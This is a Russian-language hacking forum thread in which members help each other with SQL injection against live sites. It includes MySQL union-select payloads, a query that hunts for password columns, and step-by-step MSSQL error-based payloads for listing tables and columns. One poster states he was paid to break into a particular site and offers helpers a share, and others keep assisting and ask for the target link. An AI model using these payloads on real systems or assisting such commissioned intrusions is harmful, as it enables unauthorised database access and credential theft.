Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    попробуй так -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+limit+1,1+--+
     
  2. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы

    сделай где то так

    select concat_ws(0x3a,table_schema,table_name,column_name) from information_schema.columns where column_name like '%pass%'
    // выбрать название базы + таблицы + колонки где встречается pass
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    1. Это ты мне пишешь? ))
    2. Зачем так извращаться, гораздо проще, просто посмотреть в какой бд лежит таблица.
     
    2 people like this.
  4. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    если так делать, то название колонки лучше закодировать в 0xhex, чтобы избежать лишних столкновений с magic_quotes=on
     
    1 person likes this.
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    /phpmyadmin/phpinfo.php, но вывод информации может быть запрещен
     
  6. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    все снова хай! Надеюсь в этот раз вы мне поможите! )
    Есть скуль на сайте, база mssql (юзер sa!)
    Пытаюсь вывести имена колонок
    Но имя второй вывести не могу
    Такой вариант тоже не работает
    Выводит одну и туже колонку
    nvarchar value 'AddLine1' to data type

    Что делать? Как вывести имена колонок?
     
  7. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    accid - переведи в hex. Без ковычек.
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Юзай лимит.

    И т.п...
     
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    MSSQL не поддерживает LIMIT
     
  10. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    не робит ((
    опять выводит
    converting the nvarchar value 'accid' to data type int.
     
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ты вначале таблицы хоть выведи.

    Code:
    (SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
    
    Получишь что-то типо:

    Syntax error converting the nvarchar value 'таблица' to a column of data type int.

    Code:
    (SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' таблица'))--
    А потом, с нужной таблицы уже выводишь колонки.

    Code:
    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='таблица')-
    Code:
    (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+C OLU MN_NAME+NOT+IN+('колонка'))--
     
  12. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2z00MAN
    тоже нет результатов((
    2big_BRAT
    тоже пусто(((
     
  13. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    то что я показал это пример, и на твоём конечно может не сработать, лучше брось ссылку, так будет быстрее и нагляднее
     
  14. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    R1dex
    таблицы я уже вывел

     
  15. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    покажи ссыль, мне кажется у тебя так с синтаксисом что-то не то получается...
     
  16. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    без ссылки никак?
    мне просто этот сайт взломать заказали
    а я первый раз с такой хней встречаюсь, до этого сайты c mssql уже ломал
    так что с синтаксисом все ok ;)
    P.S: кто поможет, % получит! )
     
  17. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    перед or поставь '
     
  18. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    ты мне? где ты в моем запросе or видел? )
     
  19. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name=0x74626C4163636F756E7473)--

    Он про это.
     
  20. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql
    пробывал я все это уже
     
Thread Status:
Not open for further replies.